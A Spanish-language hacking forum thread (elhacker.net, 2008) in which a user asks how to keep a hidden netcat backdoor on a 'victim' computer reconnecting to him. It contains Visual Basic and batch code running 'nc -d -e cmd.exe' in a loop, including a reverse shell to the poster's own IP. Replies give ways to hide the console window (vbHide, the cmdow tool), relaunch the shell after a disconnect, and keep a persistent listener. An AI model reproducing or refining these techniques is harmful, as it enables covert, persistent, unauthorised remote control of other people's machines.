elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Duda sobre un bucle para NetCat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Duda sobre un bucle para NetCat  (Leído 3,883 veces)
_LooSeR_

Desconectado Desconectado

Mensajes: 48



Ver Perfil
Duda sobre un bucle para NetCat
« en: 3 Marzo 2008, 21:52 pm »

Hola, bueno el caso es que estaba haciendo probatinas con el netcat. Y uno de los problemas al introducirlo en una maquina remota, es que si se cierra la conexión, no podemos volver a conectarnos hasta que no reinicie el equipo la victima. (Esto si tenemos la instruccion necesaria en el registro)

Asi que probé con un código en Batch, ya que ahi funciona a la perfeccion, creando un bucle, que haga que la victima se conecte a nosotros. Y como en un .bat, hasta que la instruccion no termine, no pasa a la siguiente, cuando conseguimos conectarnos la ejecucion del bucle queda interrumpida.

Pero el problema de esto es que aparece la ventanita de ms-dos, y aunque se puede con un "@echo off" hacer que no se vea nada, la venanita no se puede ocultar.

Así que pense en hacerla en VisualBasic con la propiedad del formulario Visible puesta en False, y poniendo este pequeño codigo:

Código:
Private Sub Form_Load()

bucle:
    Shell "nc -d -e cmd.exe -p 25554"
    GoTo bucle
   
End Sub

Claro esta, el problema es que tenemos un bucle infinito, ya que no para de ejecutar esta instrucción. Mi pregunta es si existe alguna forma de hacer que hasta que la conexion del netcat no haya terminado, no vuelva a ejecutarla.

Saludos! Gracias


En línea

naderST


Desconectado Desconectado

Mensajes: 625



Ver Perfil WWW
Re: Duda sobre un bucle para NetCat
« Respuesta #1 en: 3 Marzo 2008, 22:07 pm »

esto tiene algo que ver con VB??? porque veo puro batch!


En línea

_LooSeR_

Desconectado Desconectado

Mensajes: 48



Ver Perfil
Re: Duda sobre un bucle para NetCat
« Respuesta #2 en: 3 Marzo 2008, 22:11 pm »

Sip, estoy buscando si existe una forma en visual basic de hacer que este bucle no vuelva a iterar hasta que la conexión con netcat haya terminado.

Lo primero es un ejemplo que puse en batch, pero tiene el problema de que te aparece el pantallon de MS-DOS en negro.

Por eso trataba de hacerlo bajo VB, saludos!
En línea

juancho77


Desconectado Desconectado

Mensajes: 455


rie con demencia


Ver Perfil
Re: Duda sobre un bucle para NetCat
« Respuesta #3 en: 4 Marzo 2008, 01:10 am »

A ver. tu quieres dejar un puerto a la escucha en la maquina remota o que? No se entiende de que es el bucle!

Citar
Mi pregunta es si existe alguna forma de hacer que hasta que la conexion del netcat no haya terminado, no vuelva a ejecutarla.

Tendria que hacer uso de un condicional, como If..Then o Do while...Loop.

Código:
Do until x= 10
  x=x+1
  Msgbox x
Loop

Si especificas mejor lo del netcat te puedo pasar algun coidog hecho mas preciso.
Y a esta linea le faltaria vbHide, poque sino se ejecutaria el simbolo de sistema igualmente visible.
Código:
Código:
Private Sub Form_Load()

bucle:
    Shell "nc -d -e cmd.exe -p 25554", vbHide
    GoTo bucle
   
End Sub
En línea

_LooSeR_

Desconectado Desconectado

Mensajes: 48



Ver Perfil
Re: Duda sobre un bucle para NetCat
« Respuesta #4 en: 4 Marzo 2008, 02:40 am »

En la instrucción faltaría mi IP (en vez del -p) antes del puerto, me confundí al escribirlo.

El bucle es para hacer que siempre que acabe la conexión vuelva a intentar conectar conmigo. Pero me temo que en vb seria complicado, lo explique en batch, porque el bucle si funciona ahi, hasta que esta linea:
Código:
nc -d -e cmd.exe MiIp 25554
no termine, no salta a la siguiente instruccion en el bucle del .bat, porque esa linea termina cuando la conexión del netcat ha sido finalizada (en vb si ejecutara ese programa externo, lo ejecutaria y saltaria a la siguiente linea de codigo sin que la ejecución del netcat hubiera terminado, realizando un bucle infinito sin esperar la desconexion del netcat).

El motivo por el que no usé un loop, un while o un until fue porque no queria que ese bucle terminase, pero si que se detuviera.

De todos modos, al final encontré una solucion que es un comando para el cmd, el "cmdow" que lo descargué de internet. Y colocandoselo a la victima, y añadiendo en el codigo del bucle batch  "cmdow @ /hid" , esconde la ventana donde se ejecuta el .bat

De modo que al final conseguí hacerlo sin visual basic, la unica pega es que debemos colocar el cmdow.exe en el pc de la victima, pero ahora ya puedo estar conectado a ella siempre que quiera, ya que ella siempre está intentando conectarse conmigo, y el bucle en batch lo realiza bastante lento, por lo cual no lo percibirá.

Muchas gracias, aunque me sigue interesando el tema en Vb.

Una duda Juancho77, en vb si ejecutara en vez de ese codigo, un archivo .bat
Y le pusiera vbHide despues, ocultaría la ventana de ejecución del archivo.bat?

Lo digo porque esto tambíen me hubiera servido para lanzar desde una aplicacion en vb el bucle hecho en batch. Sin necesidad de colocarle el "cmdow" a la victima.

Saludos!
« Última modificación: 4 Marzo 2008, 02:46 am por _LooSeR_ » En línea

cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: Duda sobre un bucle para NetCat
« Respuesta #5 en: 4 Marzo 2008, 05:28 am »

en vb si ejecutara en vez de ese codigo, un archivo .bat Y le pusiera vbHide despues, ocultaría la ventana de ejecución del archivo.bat?

Efectivamente, prueba a hacerlo:

Código:
Shell "Tu_Bat.Bat", vbHide
En línea

NightZpy

Desconectado Desconectado

Mensajes: 59


"Un ser sin estudio es un ser incompleto"


Ver Perfil
Re: Duda sobre un bucle para NetCat
« Respuesta #6 en: 4 Marzo 2008, 06:40 am »

Buscas en la lista de procesos y cuando ya no este el proceso que hace la conexión, lo relanzas....

O buscas en la lista que bota el netstat -nb, y luego revisas linea por linea si la conexión está activa...

Salu2s...
En línea


blackhacking.no-ip.org "Con Server para prácticas" - "La incompetencia en masas es inversamente proporcional al sistema social"
juancho77


Desconectado Desconectado

Mensajes: 455


rie con demencia


Ver Perfil
Re: Duda sobre un bucle para NetCat
« Respuesta #7 en: 4 Marzo 2008, 06:49 am »

Ahi te lo dijo casiani  ;D
En línea

_LooSeR_

Desconectado Desconectado

Mensajes: 48



Ver Perfil
Re: Duda sobre un bucle para NetCat
« Respuesta #8 en: 4 Marzo 2008, 08:46 am »

Ok, duda resuelta muchas gracias ;)

Interesante lo que proponias NightZpy, pero eso ya supera mis conocimientos de Vb :P
En línea

Spider-Net


Desconectado Desconectado

Mensajes: 1.165


Un gran poder conlleva una gran responsabilidad


Ver Perfil WWW
Re: Duda sobre un bucle para NetCat
« Respuesta #9 en: 4 Marzo 2008, 14:40 pm »

Y no es más fácil llamar a netcat con el parámetro -L que deja a la escucha la máquina por mucho que cierres o abras la conexión??  :huh: :huh: :huh:
« Última modificación: 4 Marzo 2008, 14:44 pm por Spider-Net » En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda sobre netcat
Dudas Generales
soyloqbuskas 2 2,893 Último mensaje 5 Enero 2012, 17:18 pm
por soyloqbuskas
Duda bucle do...while
PHP
elkiy 2 2,006 Último mensaje 22 Febrero 2013, 15:17 pm
por elkiy
Duda bucle do while « 1 2 »
Programación C/C++
program_10 10 4,106 Último mensaje 11 Enero 2015, 17:11 pm
por Yoel Alejandro
Duda C# Bucle While.
.NET (C#, VB.NET, ASP)
FKT 5 2,320 Último mensaje 18 Agosto 2015, 16:05 pm
por FKT
MOVIDO: Duda C# Bucle While.
Programación C/C++
Eternal Idol 0 1,237 Último mensaje 18 Agosto 2015, 11:36 am
por Eternal Idol
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines